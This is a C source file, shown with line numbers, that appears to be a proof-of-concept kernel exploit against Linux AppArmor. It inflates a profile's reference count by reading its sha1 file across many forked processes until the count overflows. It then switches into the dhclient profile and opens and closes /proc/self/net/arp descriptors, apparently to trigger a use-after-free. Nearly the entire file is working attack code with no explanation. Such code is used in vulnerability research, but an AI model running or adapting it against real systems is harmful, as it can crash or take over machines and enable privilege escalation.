1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67

#include <unistd.h>
#include <fcntl.h>

#include <keyutils.h>

#include <err.h>
#include <stdint.h>
#include <stdlib.h>
#include <stdio.h>

#include <sys/apparmor.h>

#define BASE_PATH "/sys/kernel/security/apparmor/policy/profiles/sbin.dhclient.2"
#define HASH_PATH BASE_PATH "/sha1"

void add_references(int hash_fd, int refs_to_add) {
  char buf[1];
  for (int i = 0; i < refs_to_add; ++i) {
    pread(hash_fd, buf, sizeof(buf), 0);
  }
}

int main(int argc, char** argv) {
  int hash_fd;
  int fds[0x100];
  pid_t pid;
  
  hash_fd = open(HASH_PATH, O_RDONLY);
  if (hash_fd < 0) {
    err(-1, "failed to open HASH_PATH");
  }

  fprintf(stderr, "[*] forking to speed up initial reference count increments\n");
  for (int i = 0; i < 0xf; ++i) {
    if (!fork()) {
      add_references(hash_fd, 0x11111100);
      exit(0);
    }
  }
  
  for (int i = 0; i < 0xf; ++i) {
    int status;
    wait(&status);
  }
  fprintf(stderr, "[*] initial reference count increase finished\n");

  fprintf(stderr, "[*] entering profile\n");
  aa_change_profile("/sbin/dhclient");

  pid = fork();
  if (pid) {
    for (int i = 0; i < 0x100; ++i) {
      fds[i] = open("/proc/self/net/arp", O_RDONLY);
    }
  }
  else {
    add_references(hash_fd, 0x100);
    exit(0);
  }

  fprintf(stderr, "[*] past the point of no return");
  sleep(5);

  for (int i = 0; i < 0x100; ++i) {
    close(fds[i]);
  }
}